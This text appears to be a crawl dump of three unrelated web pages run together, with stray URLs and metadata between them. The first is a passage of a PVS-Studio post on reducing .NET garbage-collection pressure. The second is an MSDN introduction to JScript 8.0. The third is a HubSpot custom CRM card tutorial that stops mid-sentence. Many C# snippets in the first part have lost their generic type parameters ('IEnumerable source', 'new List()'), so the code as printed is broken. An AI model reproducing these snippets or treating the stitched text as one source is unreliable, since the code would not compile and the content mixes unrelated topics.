node.IsKind(SyntaxKind.DoStatement) || node.IsKind(SyntaxKind.WhileStatement); ``` This edit reduced the number of the temporary arrays needed — and eased the pressure on GC. **Note**: Sometimes .NET libraries use a clever trick. Some methods with *params* parameters have overloads that take 1,2,3 parameters of the corresponding type instead of the *params* parameter. This trick helps avoid creating temporary arrays from the caller side. Enumerable.Any -------------- We have seen many times the *Any* method call in the profiling results. What's wrong with it? Let's look at the real code: the *IsKindEqual* method we've mentioned earlier. Previously we placed more emphasis on the *params* parameter. Now let's take a closer look at the method's code from the inside. ``` public static bool IsKindEqual(this SyntaxNode node, params SyntaxKind[] kinds) { return kinds.Any(kind => node.IsKind(kind)); } ``` To understand what the problem is with *Any*, we'll look "under the hood" of the method. We take the source code from our beloved [referencesource.microsoft.com](https://bit.ly/36vRkKo) ``` public static bool Any(this IEnumerable source, Func predicate) { if (source == null) throw Error.ArgumentNull("source"); if (predicate == null) throw Error.ArgumentNull("predicate"); foreach (TSource element in source) { if (predicate(element)) return true; } return false; } ``` The *foreach* loopiterates through the original collection*.* If the *predicate* call has returned the *true* value for at least one element, then the result of the method's work is *true*. Otherwise, it's *false*. The main problem is that any input collection is actually interpreted as *IEnumerable*. Any optimizations for specific types of collections don't exist. A little reminder that we are working with an array in this case. You may have already guessed that the main problem with *Any* is that it creates an excess iterator to traverse the collection. If you got a little lost — don't worry, we're going to figure it out. Let's cut off the extra fragments of the *Any* method and simplify it. However, we'll save the necessary code: the *foreach* loop and the declaration of collection, with which the loop works. Let's look at the following code: ``` static void ForeachTest(IEnumerable collection) { foreach (var item in collection) Console.WriteLine(item); } ``` The IL code: ``` .method private hidebysig static void ForeachTest( class [mscorlib]System.Collections.Generic.IEnumerable`1 collection) cil managed { .maxstack 1 .locals init ( [0] class [mscorlib]System.Collections.Generic.IEnumerator`1 V\_0) IL\_0000: ldarg.0 IL\_0001: callvirt instance class [mscorlib]System.Collections.Generic.IEnumerator`1 class [mscorlib]System.Collections.Generic.IEnumerable`1::GetEnumerator() IL\_0006: stloc.0 .try { IL\_0007: br.s IL\_0014 IL\_0009: ldloc.0 IL\_000a: callvirt instance !0 class [mscorlib]System.Collections.Generic.IEnumerator`1::get\_Current() IL\_000f: call void [mscorlib]System.Console::WriteLine(string) IL\_0014: ldloc.0 IL\_0015: callvirt instance bool [mscorlib]System.Collections.IEnumerator::MoveNext() IL\_001a: brtrue.s IL\_0009 IL\_001c: leave.s IL\_0028 } finally { IL\_001e: ldloc.0 IL\_001f: brfalse.s IL\_0027 IL\_0021: ldloc.0 IL\_0022: callvirt instance void [mscorlib]System.IDisposable::Dispose() IL\_0027: endfinally } IL\_0028: ret } ``` See, a lot of things are happening here. Since the compiler doesn't know anything about the actual collection type, it has generated general-purpose code to iterate through the collection. The iterator is obtained by calling the *GetEnumerator* method (the IL\_0001 label). If we obtain the iterator via the *GetEnumerator* method call, it will be created on the heap. All further interaction with the collection is based on the use of this object. The compiler can use a special optimization while obtaining an iterator for an empty array. In this case, the *GetEnumerator* call doesn't create a new object. This topic deserves a separate note. In general case, don't count on this optimization. Now let's change the code a little, so the compiler knows that we're working with the array. C# code: ``` static void ForeachTest(String[] collection) { foreach (var item in collection) Console.WriteLine(item); } ``` The corresponding IL code: ``` .method private hidebysig static void ForeachTest(string[] collection) cil managed { // Code size 25 (0x19) .maxstack 2 .locals init ([0] string[] V_0, [1] int32 V_1) IL_0000: ldarg.0 IL_0001: stloc.0 IL_0002: ldc.i4.0 IL_0003: stloc.1 IL_0004: br.s IL_0012 IL_0006: ldloc.0 IL_0007: ldloc.1 IL_0008: ldelem.ref IL_0009: call void [mscorlib]System.Console::WriteLine(string) IL_000e: ldloc.1 IL_000f: ldc.i4.1 IL_0010: add IL_0011: stloc.1 IL_0012: ldloc.1 IL_0013: ldloc.0 IL_0014: ldlen IL_0015: conv.i4 IL_0016: blt.s IL_0006 IL_0018: ret } ``` The compiler generated simpler code since it knows the collection type we're working with. Besides, all the work with the iterator has disappeared — the object is not even created. We reduce the pressure on GC. By the way, here's a "check yourself" question. If we restore C# code from this IL code, what kind of a language construction do we get? The code is obviously different from what was generated for the *foreach* loop earlier. Here's the answer. Below is the method in C#. The compiler will generate the same IL code as the one above, except for the names: ``` static void ForeachTest2(String[] collection) { String[] localArr; int i; localArr = collection; for (i = 0; i < localArr.Length; ++i) Console.WriteLine(localArr[i]); } ``` If the compiler knows that we're working with an array, it generates more optimal code by representing the *foreach* loop as the *for* loop. Unfortunately, we lose such optimizations when working with *Any*. Besides, we create an excess iterator to traverse the sequence. Lambda expressions ------------------ Lambdas are highly convenient things that make the developer's life so much easier. Until someone tries to put a lambda inside a lambda inside a lambda… Fans of doing that — please rethink this, seriously. In general, the use of lambda expressions eases the developer's life. But don't forget that there are entire classes "under the hood" of a lambdas. This means, the instances of those classes still need to be created when your application uses lambdas. Let's get back to the *IsKindEqual* method. ``` public static bool IsKindEqual(this SyntaxNode node, params SyntaxKind[] kinds) { return kinds.Any(kind => node.IsKind(kind)); } ``` Now let's look at the corresponding IL code: ``` .method public hidebysig static bool IsKindEqual( class [Microsoft.CodeAnalysis]Microsoft.CodeAnalysis.SyntaxNode node, valuetype [Microsoft.CodeAnalysis.CSharp]Microsoft.CodeAnalysis.CSharp.SyntaxKind[] kinds) cil managed { .custom instance void [mscorlib]System.Runtime.CompilerServices.ExtensionAttribute:: .ctor() = ( 01 00 00 00 ) .param [2] .custom instance void [mscorlib]System.ParamArrayAttribute:: .ctor() = ( 01 00 00 00 ) // Code size 32 (0x20) .maxstack 3 .locals init (class OptimizationsAnalyzer.SyntaxNodeUtils/'<>c__DisplayClass0_0' V_0) IL_0000: newobj instance void OptimizationsAnalyzer.SyntaxNodeUtils/'<>c__DisplayClass0_0'::.ctor() IL_0005: stloc.0 IL_0006: ldloc.0 IL_0007: ldarg.0 IL_0008: stfld class [Microsoft.CodeAnalysis]Microsoft.CodeAnalysis.SyntaxNode OptimizationsAnalyzer.SyntaxNodeUtils/'<>c__DisplayClass0_0'::node IL_000d: ldarg.1 IL_000e: ldloc.0 IL_000f: ldftn instance bool OptimizationsAnalyzer.SyntaxNodeUtils/'<>c__DisplayClass0_0' ::'b\_\_0'( valuetype [Microsoft.CodeAnalysis.CSharp]Microsoft.CodeAnalysis .CSharp.SyntaxKind) IL\_0015: newobj instance void class [mscorlib]System.Func`2< valuetype [Microsoft.CodeAnalysis.CSharp] Microsoft.CodeAnalysis.CSharp.SyntaxKind,bool>::.ctor( object, native int) IL\_001a: call bool [System.Core]System.Linq.Enumerable::Any< valuetype [Microsoft.CodeAnalysis.CSharp]Microsoft.CodeAnalysis .CSharp.SyntaxKind>( class [mscorlib]System.Collections.Generic.IEnumerable`1, class [mscorlib]System.Func`2) IL\_001f: ret } ``` There's a little more code here than in C#. Note instructions for creating objects on labels IL\_0000 and IL\_0015. In the first case, the compiler creates an object of the type that it generated automatically (under the lambda's "hood"). The second *newobj* call is the creation of the delegate instance that performs the *IsKind* check. Bear in mind, that in some cases the compiler may apply optimizations and not add the *newobj* instruction to create the generated type instance. Instead, the compiler can, for example, create an object once, write it to a static field and continue working with this field. The compiler behaves this way when there are no captured variables in lambda expressions. A rewritten IsKindEqual variant ------------------------------- Several temporary objects are created for every *IsKindEqual* call. As experience (and profiling) shows, sometimes this can play a significant role in terms of the pressure on GC. One of the variants is to avoid the method at all. The caller can simply call the *IsKind* method several times. Another option is to rewrite the code. The "before" version looks like this: ``` public static bool IsKindEqual(this SyntaxNode node, params SyntaxKind[] kinds) { return kinds.Any(kind => node.IsKind(kind)); } ``` One of the possible 'after' versions looks like this: ``` public static bool IsKindEqual(this SyntaxNode node, params SyntaxKind[] kinds) { for (int i = 0; i < kinds.Length; ++i) { if (node.IsKind(kinds[i])) return true; } return false; } ``` **Note**: You can rewrite the code with *foreach*. When the compiler knows that we are working with the array, it generates IL code of the *for* loop 'under the hood'. As a result, we got a little more code, but we got rid of the temporary objects creation. We can see this by looking at IL code — all of the *newobj* instructions have disappeared. ``` .method public hidebysig static bool IsKindEqual(class Optimizations.SyntaxNode node, valuetype Optimizations.SyntaxKind[] kinds) cil managed { .custom instance void [mscorlib]System.Runtime.CompilerServices.ExtensionAttribute:: .ctor() = ( 01 00 00 00 ) .param [2] .custom instance void [mscorlib]System.ParamArrayAttribute:: .ctor() = ( 01 00 00 00 ) // Code size 29 (0x1d) .maxstack 3 .locals init ([0] int32 i) IL_0000: ldc.i4.0 IL_0001: stloc.0 IL_0002: br.s IL_0015 IL_0004: ldarg.0 IL_0005: ldarg.1 IL_0006: ldloc.0 IL_0007: ldelem.i4 IL_0008: callvirt instance bool Optimizations.SyntaxNode::IsKind(valuetype Optimizations.SyntaxKind) IL_000d: brfalse.s IL_0011 IL_000f: ldc.i4.1 IL_0010: ret IL_0011: ldloc.0 IL_0012: ldc.i4.1 IL_0013: add IL_0014: stloc.0 IL_0015: ldloc.0 IL_0016: ldarg.1 IL_0017: ldlen IL_0018: conv.i4 IL_0019: blt.s IL_0004 IL_001b: ldc.i4.0 IL_001c: ret } ``` Redefining base methods in value types -------------------------------------- Sample code: ``` enum Origin { } void Foo() { Origin origin = default; while (true) { var hashCode = origin.GetHashCode(); } } ``` Does this code exhibit pressure on GC? Okay-okay, given that the code is in the article, the answer is quite obvious. Believed it? Everything is not that simple. To answer this question, we need to know if the application works on .NET Framework or .NET. By the way, how did the pressure on GC appear here at all? No objects seem to be created on the managed heap. We had to look into IL code and read the specifications to understand the topic. I covered this issue in more detail in [a separate article](https://pvs-studio.com/en/blog/posts/csharp/0844/). In short, here are some spoilers: * Object boxing for the *GetHashCode* method call may take place; * If you want to avoid the boxing, redefine the base methods in the value types. Setting collections' initial capacity ------------------------------------- Some people might say: "Why do we need to set the initial capacity of the collection, everything is already optimized under the "hood"". Of course, something is optimized (and we'll see what exactly). But let's talk about the application's places where creating almost every object can play a trick on us. Don't neglect the opportunity to tell the application the collection size you need. Let's talk about why it is useful to set the initial capacity. We'll use the *List* type as an example. Let's say we have the following code: ``` static List CloneExample(IReadOnlyCollection variables) { var list = new List(); foreach (var variable in variables) { list.Add(variable.Clone()); } return list; } ``` Is it obvious what the problem is with this code? If yes — congratulations. If no, then let's figure it out. We are creating an empty list and gradually filling it. Accordingly, every time the list runs out of capacity, we need: * allocate memory for a new array, into which the list elements are added; * copy the elements from the previous list to the new one. Where's the array coming from? The array is the base of the *List* type. Check [referencesource.microsoft.com](https://bit.ly/3Bfs1KK). Obviously, the larger the size of the *variables* collection, the greater the number of such operations is performed. The list growth algorithm in our case (for .NET Framework 4.8) is 0, 4, 8, 16, 32… I.e. if the *variables* collection has 257 elements, it requires 8 arrays to be created, and 7 copy operations. You can avoid all of these unnecessary procedures if you set the list capacity at the beginning: ``` var list = new List(variables.Count); ``` Don't neglect that opportunity. LINQ: miscellaneous ------------------- ### Enumerable.Count Depending on the overload, the *Enumerable.Count* method can: * calculate the number of items in a collection; * calculate the number of elements in the collections that satisfy a predicate. Moreover, the method offers several optimizations… but there's a catch. Let's look inside the method. We take the source code as usual, from [referencesource.microsoft.com](https://bit.ly/3xA5LJx) The version that does not accept the predicate looks like this: ``` public static int Count(this IEnumerable source) { if (source == null) throw Error.ArgumentNull("source"); ICollection collectionoft = source as ICollection; if (collectionoft != null) return collectionoft.Count; ICollection collection = source as ICollection; if (collection != null) return collection.Count; int count = 0; using (IEnumerator e = source.GetEnumerator()) { checked { while (e.MoveNext()) count++; } } return count; } ``` And here's the version with the predicate: ``` public static int Count(this IEnumerable source, Func predicate) { if (source == null) throw Error.ArgumentNull("source"); if (predicate == null) throw Error.ArgumentNull("predicate"); int count = 0; foreach (TSource element in source) { checked { if (predicate(element)) count++; } } return count; } ``` Good news: the no-predicate version has an optimization that allows to efficiently calculate the number of elements for collections that implement *ICollection* or *ICollection*. However, if a collection does not implement any of these interfaces, the entire collection would be traversed to get the number of elements. This is especially interesting in the predicate method. Suppose we have the following code: ``` collection.Count(predicate) > 12; ``` And *collection* has 100 000 elements. Get it? In order to check this condition, it would have been enough for us to find 13 elements for which *predicate(element)* would return *true*. Instead, *predicate* is applied to all of the 100 000 elements in the collection. It becomes extremely inconvenient if *predicate* performs some relatively heavy operations. There is a way out – go ahead and reinvent the wheel. Write your own *Count* analog(s). It's up to you to decide which method signature to make (and whether to make them at all). You can write several different methods. Or you can write a method with a tricky signature that would help determine which comparison you need ('>', '<', '==' etc). If you have identified *Count*-related bottlenecks, but there are only a couple of them – just use the *foreach* loop and rewrite them. ### Any -> Count / Length We have already determined that calling the *Any* method may require one extra iterator. We can avoid the creation of an extra object by using the specific collections' properties. *List.Count* or *Array.Length*, for example. For example: ``` static void AnyTest(List values) { while (true) { // GC if (values.Any()) // Do smth // No GC if (values.Count != 0) // Do smth } } ``` Such code is less flexible and maybe a little less readable. But at the same time, *it might* help avoid the creating of extra iterator. Yes, *it might*. Because this depends on whether the *GetEnumerator* method returns a new object. When I examined the issue more closely, I found some interesting moments. Maybe I'll write an article on them later. ### LINQ -> loops As experience shows, in places where each temporary object can slow performance, it makes sense to abandon LINQ in favor of simple loops. We've already talked about it when we reviewed examples with *Any* and *Count*. The same applies to other methods. Example: ``` var strings = collection.OfType() .Where(str => str.Length > 62); foreach (var item in strings) { Console.WriteLine(item); } ``` You can rewrite the code above like this: ``` foreach (var item in collection) { if (item is String str && str.Length > 62) { Console.WriteLine(str); } } ``` This is a primitive example where the difference is not very significant. Although there are also cases where LINQ queries are much easier to read than similar code in loops. So, bear in mind that it's a dubious idea to just abandon LINQ everywhere. **Note**: If you have forgotten why LINQ causes the creation of objects on the heap, go through [this video](https://youtu.be/lVbXyeNp3yI) or [this article](https://pvs-studio.com/en/blog/posts/csharp/0836/). ### Buffering LINQ requests Don't forget that every time you traverse a sequence, LINQ queries with deferred calculation are executed all over again. The following example clearly demonstrates this: ``` static void LINQTest() { var arr = new int[] { 1, 2, 3, 4, 5 }; var query = arr.Where(AlwaysTrue); foreach (var item in query) // 5 { /* Do nothing */} foreach (var item in query) // 5 { /* Do nothing */} foreach (var item in query) // 5 { /* Do nothing */} bool AlwaysTrue(int val) => true; } ``` In this case the *AlwaysTrue* method is executed 15 times. At the same time if we had buffered the request (added the *ToList* method call to the LINQ call chain), the *AlwaysTrue* method would have been called only 5 times. Changing the garbage collection mode ------------------------------------ I have mentioned above that we have already done a number of optimizations in the PVS-Studio C# analyzer. We even wrote an article about that. After publishing it on habr.com, the article prompted a heated discussion [in the comments](https://habr.com/en/company/pvs-studio/blog/562894/comments/). One of the suggestions was to change the garbage collector settings. Can't say we didn't know about them. Moreover, when I was doing optimizations and reading a book "Pro .NET Performance: Optimize Your C# Applications", I also read about the GC settings. But somehow I didn't catch on to the fact that changing the garbage collection mode can bring any benefits. My bad. During my vacation, my colleagues did a very cool thing: they took the advice from the comments and decided to try altering the GC working mode. The result was impressive — the time that PVS-Studio C# required to analyze big projects (like Roslyn) was significantly reduced. At the same time, PVS-Studio used up more memory when analyzing small projects, but that was acceptable. After we altered the GC working mode, the analysis time decreased by 47%. Before, the analysis on this machine took 1 hour and 17 minutes. After — only 41 minutes. ![0852_NETAppsPerf_MinChangesMajorRes/image4.png](https://habrastorage.org/r/w1560/getpro/habr/post_images/d6c/32b/3f1/d6c32b3f18af2803d929eb27b3f168d4.png) I was excited to see Roslyn analysis take under 1 hour. We were so pleased with the results that we included the new (server) garbage collection mode in the C# analyzer. This mode will be enabled by default starting from the PVS-Studio 7.14. Sergey Tepliakov described the different garbage collection modes in more detail in [this article](https://devblogs.microsoft.com/premier-developer/understanding-different-gc-modes-with-concurrency-visualizer/). PVS-Studio C# analyzer optimization results ------------------------------------------- We have made a number of other optimizations. For example: * we got rid of the bottlenecks in some diagnostics (and [rewrote](https://pvs-studio.com/en/blog/posts/csharp/0823/) one); * we optimized the objects used in data-flow analysis: simplified copying, included additional caching, eliminated temporary objects on the managed heap; * optimized the comparison of tree nodes; * etc. We began to add all these optimizations slowly, starting from the PVS-Studio version 7.12. By the way, during this time, we also [added](https://pvs-studio.com/en/docs/manual/0010/) new diagnostics, .NET 5 support, and taint analysis. For the sake of curiosity, I measured the analysis time of our open-source projects from out tests using PVS-Studio 7.11 and 7.14. I compared the analysis results of the projects that PVS-Studio took the longest to process. On the graph below, you can see the analysis time (in minutes): * the Juliet Test Suite project; * the Roslyn project; * the total time of analysis of all projects from the tests. The graph itself: ![0852_NETAppsPerf_MinChangesMajorRes/image5.png](https://habrastorage.org/r/w1560/getpro/habr/post_images/4fd/c4d/e38/4fdc4de3802f397335170781b24e0a7e.png) The increase in performance is clearly very significant. So, if you're not content with the operating speed of PVS-Studio for C#, come [try](https://pvs-studio.com/en-dotnet) again. By the way, you can get an extended trial version for 30 days – just follow the link :) If you encounter any problems — [contact our support](https://pvs-studio.com/en/about-feedback/), we will sort it out. Conclusion ---------- Premature optimization is evil. Long live optimization based on profiling results! And remember that every small change in the right place of a reusable block of code can drastically affect performance. As always, subscribe to [my Twitter](https://twitter.com/_SergVasiliev_) so as not to miss anything interesting.
https://habr.com/ru/post/572306/
null
null
4,841
52.46
Introduction to JScript 8.0 for JScript Programmers The information presented here is mainly for programmers who are already familiar with JScript and want to learn about the new features introduced in JScript 8.0. Common Tasks - How to compile programs The JScript 8.0 command-line compiler creates executables and assemblies from JScript programs. For more information, see How to: Compile JScript Code from the Command Line. - How to write a "Hello World" program It is easy to write the JScript 8.0 version of "Hello World". For more information, see The JScript Version of Hello World!. - How to use data types In JScript 8.0, a colon specifies the type in a variable declaration or function definition. The default type is Object, which can hold any of the other types. For more information, see JScript Variables and Constants and JScript Functions. JScript 8.0 has several built-in data types (such as int, long, double, String, Object, and Number). For more information, see JScript Data Types. You can also use any .NET Framework data type after importing the appropriate namespace. For more information, see .NET Framework Class Library Reference. - How to access a namespace A namespace is accessed using either the import statement (when using the command-line compiler) or the @import directive (when using ASP.NET). For more information, see import Statement. The /autoref option (which is on by default) automatically attempts to reference the assemblies that correspond to namespaces used in a JScript .NET program. For more information, see /autoref. - How to create typed (native) arrays A typed array data type is declared by placing square brackets ([]) after the data type name. You can still use JScript array objects, objects created with the Array constructor. For more information, see Arrays Overview. - How to create a class In JScript 8.0, you can define your own classes. Classes can include methods, fields, properties, static initializers, and sub-classes. You can write a completely new class, or you can inherit from an existing class or interface. Modifiers control the visibility of the class members, how members are inherited, and the overall behavior of a class. Custom attributes can also be used. For more information, see Class-based Objects and JScript Modifiers.
http://msdn.microsoft.com/en-US/library/5kas1c51(v=vs.80).aspx
CC-MAIN-2014-23
refinedweb
373
60.01
Category: Tinkering Authoring Multiple Docs from a Single IPython Notebook It’s my not-OU today, and whilst I should really be sacrificing it to work on some content for a FutureLearn course, I thought instead I’d tinker with a workflow tool related to the production process we’re using. The course will be presented as a set of HTML docs on FutureLearn, supported by a set of IPython notebooks that learners will download and execute themselves. The handover resources will be something like: – a set of IPython notebooks; – a Word document for each week containing the content to appear online. (This document will be used as the basis for multiple pages on the course website. The content is entered into the FutureLearn system by someone else as markdown (though I’m not sure what flavour?) – for each video asset, a Word document containing the script; – ?separate image files (the images will also be in the Word doc). Separate webpages provide teaching that leads into a linked to IPython notebook. (Learners will be running IPython via Anaconda on their own desktops – which means tablet/netbook users won’t be able to do the interactive activities as currently delivered; we looked at using Wakari, but didn’t go with it; offering our own hosted solution or tmpnb server was considered out of scope.) The way I have authored my week is to create a single IPython document that proceeds in a linear fashion, with “FutureLearn webpage” content authored using as markdown, as well as incorporating executed code cells, followed by “IPython notebook” activity content relating to the previous “webpage”. The “IPython notebook” sections are preceded by a markdown cell containing a NOTEBOOK START statement, and closed with markdown cell containing a NOTEBOOK END statement. I then run a simple script that: - generates one IPython notebook per “IPython notebook” section; - creates a monolithic notebook containing all, but just, the “FutureLearn webpage” content; - generates a markdown version of that monolithic notebook; - uses pandoc to convert the monolithic markdown doc to a Microsoft Word/docx file. Note that it would be easy enough to render each “FutureLearn webpage” doc as markdown directly from the original notebook source, into its own file that could presumably be added directly to FutureLearn, but that was seen as being overly complex compared to the original “copy rendered markdown from notebook into Word and then somehow generate markdown to put into FutureLearn editor” route. import io, sys import IPython.nbformat as nb import IPython.nbformat.v4.nbbase as nb4 #Are we in a notebook segment? innb=False #Quick and dirty count of notebooks c=1 #The monolithic notebook is the content ex of the separate notebook content monolith=nb4.new_notebook() #Load the original doc in mynb=nb.read('ORIGINAL.ipynb',nb.NO_CONVERT) #For each cell in the original doc: for i in mynb['cells']: if (i['cell_type']=='markdown'): #See if we can stop a standalone notebook code delimiter if ('START NOTEBOOK' in i['source']): #At the start of a block, create a new notebook innb=True test=nb4.new_notebook() elif ('END NOTEBOOK' in i['source']): #At the end of the block, save the code to a new standalone notebook file innb=False nb.write(test,'test{}.ipynb'.format(c)) c=c+1 elif (innb): test.cells.append(nb4.new_markdown_cell(i['source'])) else: monolith.cells.append(nb4.new_markdown_cell(i['source'])) elif (i['cell_type']=='code'): #For the code cells, preserve any output text cc=nb4.new_code_cell(i['source']) for o in i['outputs']: cc['outputs'].append(o) #Route the code cell as required... if (innb): test.cells.append(cc) else: monolith.cells.append(cc) #Save the monolithic notebook nb.write(monolith,'monolith.ipynb') #Convert it to markdown !ipython nbconvert --to markdown monolith.ipynb ##On a Mac, I got pandoc via: #brew install pandoc #Generate a Microsoft .docx file from the markdown !pandoc -o monolith.docx -f markdown -t docx monolith.md What this means is that I can author a multiple chapter, multiple notebook minicourse within a single IPython notebook, then segment it into a variety of different standalone files using a variety of document types. Of course, what I really should have been doing was working on the course material… but then again, it was supposed to be my not-OU today…;-) Data Driven Press Releases From HSCIC Data – Diabetes Prescribing By chance, I saw a tweet from the HSCIC yesterday announcing Prescribing for Diabetes, England – 2005/06 to 2014/15′ #hscicstats. The data comes via a couple of spreadsheets, broken down at the CCG level. As an experiment, I thought I’d see how quickly I could come up with a story form and template for generating a “data driven press release” that localises the data, and presents it in a textual form, for a particular CCG. It took a couple of hours, and at the moment my recipe is hard coded to the Isle of Wight, but it should be easily generalisable to other CCGs (the blocker at the moment is identifying regional codes from CCG codes (the spreadsheets in the release don’t provide that linkage – another source for that data is required). Anyway, here’s what I came up with: Figures recently published by the HSCIC show that for the reporting period Financial 2014/2015, the total Net Ingredient Costs (NIC) for prescribed diabetes drugs was £2,450,628.59, representing 9.90% of overall Net Ingredient Costs. The ISLE OF WIGHT CCG prescribed 136,169 diabetes drugs items, representing 4.17% of all prescribed items. The average net ingredient cost (NIC) was £18.00 per item. This compares to 4.02% of items (9.85% of total NIC) in the Wessex (Q70) region and 4.45% of items (9.98% of total NIC) in England. Of the total diabetes drugs prescribed, Insulins accounted for 21,170 items at a total NIC of £1,013,676.82 (£47.88 per item (on average), 0.65% of overall prescriptions, 4.10% of total NIC) and Antidiabetic Drugs accounted for 93,660 items at a total NIC of £825,682.54 (£8.82 per item (on average), 2.87% of overall prescriptions, 3.34% of total NIC). For the NHS ISLE OF WIGHT CCG, the NIC in 2014/15 per patient on the QOF diabetes register in 2013/14 was £321.53. The QOF prevalence of diabetes, aged 17+, for the NHS ISLE OF WIGHT CCG in 2013/14 was 6.43%. This compares to a prevalence rate of 6.20% in Wessex and 5.70% across England. All the text generator requires me to do is pass in the name of the CCG and the area code, and it does the rest. You can find the notebook that contains the code here: diabetes prescribing textualiser. Fragments –. Running a Shell Script Once Only in vagrant Via somewhere (I’ve lost track of the link), here’s a handy recipe for running a shell script once and once only from Vagrantfile. In the shell script (runonce.sh): #!/bin/bash if [ ! -f ~/runonce ] then #ONCE RUN CODE HERE touch ~/runonce fi In the Vagrantfile: config.vm.provision :shell, :inline => <<-SH chmod ugo+x /vagrant/runonce.sh /vagrant/runonce.sh SH Exporting and Distributing Docker Images and Data Container Contents Although! Dood…:-) A Quick Look at Planning Data on the Isle of Wight One of the staples that I suspect many folk look to in our weekly local paper, the Isle of Wight local press, is the listing of recent planning notices. The Isle of Wight Council website also provides a reasonably comprehensive online source about planning information. Notices are split across several listings: - applications currently under consideration; - recent decisions; - current and recent appeals; - archive search (back to February, 2004). It’s easy enough to knock up a scraper to grab the list of current applications, scrape each of the linked to application pages in turn, and then generate a map showing the locations of the current planning applications. Indeed, working with my local hyperlocal onthewight.com, here’s a sketch of exactly such an approach, published for the first time yesterday: Isle of Wight planning applications : Mapped (announcement). I’m hoping to do a lot more with OnTheWight – and perhaps others…? – over the coming weeks and months, so it’d great to hear any feedback you have either here, or on the OnTheWight site itself. Where Next? The sketch is a good start, but it’s exactly that. If we are going to extend the service, for example, by also providing a means of reviewing recently accepted (or rejected) applications, as well as applications currently under appeal, we perhaps need to think a little bit more clearly about how we store the data – and keep track of where it is in the planning process. If we look at the page for a particular application, we see that there are essentially three tables: The listings pages also take slightly different forms. All of them have an address, and all of them have a planning application identification number (though in two forms, albeit intersecting); but they differ in terms of the semantics of the third and possible fourth columns, although each ultimately resolves to a date or null value. – current (and archive) listings: – recent decisions: – appeals: At the moment, the OnTheWight sketchmap is generated from a scrape of the Isle of Wight Council current planning applications page (latitude and longitude are generated by geocoding the address). A more complete solution would be to start to build a database of all applications, though this requires a little bit of thought when it comes to setting up the database so it becomes possible to track the current state of a particular application. It might also be useful to put together a simple flow chart that shows how the public information available around an application evolves as an application progresses and then build a data model that can readily reflect that. We could then start to annotate that chart with different output opportunities – for example, as the map goes, it’s easy enough to imagine several layers: a current applications layer, a (current) appeals layer, a recent decisions layer, an archived decision layer. A process diagram would also allow us to start spotting event opportunities around which we might be able to generate alerts. For example, generating feeds that that allow you to identify changes in application activity within a particular unit postcode or postcode district (ONS: UK postcode structure) or ward could act as the basis of a simple alerting mechanism. It’s then easy enough to set up an IFTT feed to email pipe, though longer term an “onsite” feed to email subscription service would allow for a more local service. (Is there a WordPress plugin that lets logged in users generate multiple email subscriptions to different feeds? In terms of other value-adds that arise from processing the data, I can think of a few… For example, keeping track of repeated applications to the same property, analysing which agents are popular in terms of applications (and perhaps generating a league table of success rates!), linkage to other location based services (for example, license applications or prices paid data) and so on. Takes foot off spade and stops looking into the future, surveys weeds and half dug hole…;-)
http://blog.ouseful.info/category/tinkering/
CC-MAIN-2015-35
refinedweb
1,886
60.85
Using HubSpot’s Custom CRM Cards Without an Integration Recently updated on The marketing software company HubSpot offers a nifty feature called "custom CRM cards." The idea is that a HubSpot dashboard can send a GET request to an API that you maintain, retrieve some JSON-formatted information and render it in some "cards" alongside other data (fig. 1). Figure 1 One of our clients wished to use this feature to pull in some data from their Django site without leaving HubSpot, and this turned out to be trickier than one might expect. Although HubSpot's own documentation is well written, it assumes that the reader is familiar with certain other aspects of HubSpot. For those new to HubSpot's features and products, as I was, it might not be enough to get you all the way to your goal. In this article we will explore, from beginning to end, how to create the cards and how to make them render in your dashboard. First and foremost, you will need access to a HubSpot account. Assuming you have this, read on. PART I - Creating the Card The custom CRM cards aren't created as free-standing entities that can be configured entirely within your HubSpot dashboard; rather, they have to exist inside a HubSpot "app" that you create. Creating an app requires a HubSpot developer account. This is different from an ordinary HubSpot account, but you need the ordinary account to create the developer account inside it. If you don't have one already, you can create one by going to. Once you've created the developer account, find your way to your developer account dashboard. You should see options to "Manage apps" and "Manage test accounts" (fig. 2). Figure 2 We're going to need both, but for now click "Manage apps," and then "Create app." And that's it! The app is now created. Rename it if you want, but at this point you are ready to configure your custom CRM cards. On the dashboard of the app you just created you should have a few choices in the left-hand nav. We're going to need "Basic Info" and "CRM cards," but let's start by clicking "CRM Cards." This part is pretty straightforward and is well documented at the link above. However, I'll summarize the procedure here: Click "Create CRM Card." This should bring up a UI with three tabs, "Data request," "Card properties" and "Custom actions." Select the "Data request" tab (fig. 3). Figure 3 In the field labeled "Data fetch URL" you'll enter the endpoint of the API you're going to make that will return the JSON used to populate the card. Note: We're not going to discuss how to build an API here; that can be done by any method you choose. All that matters is that the API be accessible over HTTPS at a fully qualified domain name, and that it return a JSON response with a couple of specific fields. First, it must contain a property called "results" that is associated to a list of JSON objects (key-value pairs). Second, each object in the list must -- at a minimum -- have properties called "objectId" and "title." If either property is missing, the card will not render. The structure of the JSON response is documented under the "Webhooks" tab at the HubSpot documentation URL above. Below "Data fetch URL" is "Target record types," where we have a grid of three columns (fig. 4). Figure 4 By flipping the switches in the column labeled "Appear on this type?" you determine the contexts in which your HubSpot dashboard will attempt to render the cards. Go ahead and flip the switch in the "Contacts" row. Now the cards will appear when you visit the "Contacts" area of your dashboard. The third column of the grid is "properties sent from hubspot." This represents the information that will eventually be sent in the querystring of the GET request to your API. For now, just add "hs_object_id" in there. Now your display should look like figure 4 above. That's everything we need to do on the "Data request" tab. In fact, that's all we need to do on this page, but I'd like to briefly discuss the "Card properties" tab and how it can affect what gets rendered in the card. When the CRM card fetches data from your API, it doesn't automatically render everything it receives in the response. For example, your response might look like this: { "results": [ { "objectId": 1, "title": "Test object one", "description": "The first test object" } ] } The formatting is correct, with a "results" property followed by a list of objects (well, one object). Furthermore, each object supplies the required "objectId" and "title" properties, as discussed above. This response is valid, and if you had everything else running, the "title" would be rendered in your card. But presumably you'd like your card to tell you more than just a "title." For example, the object in this response also contains a "description" property. Here's the trick though: properties other than "title" will not render in your CRM card unless you also declare them in the "Card properties" tab. If you click on that tab and then click "add property," you can tell the card to look for a property named "description" with a data type of "string" and to display it with a label of your choosing. Now the "description" property in your JSON response will be rendered in the card. You can declare as many properties as you want in this way, and the order in which you declare them defines the order in which they will appear. This arrangement sounds all right at first, but it has its drawbacks. First, you must manually declare each individual property, assigning it a label and data type, in order to render it in your card. This quickly becomes tiresome. Second, there is no easy way to reorder properties once you've declared them. If you declare 10 properties and then decide you'd like property 4 to appear third instead of fourth, you'll have to delete your properties 3 - 10 and start over from there. Luckily, there's a workaround: Don't declare your additional properties on the same level with "objectId" and "title." Instead, put them into an inner object called, appropriately, "properties." Anything in the "properties" 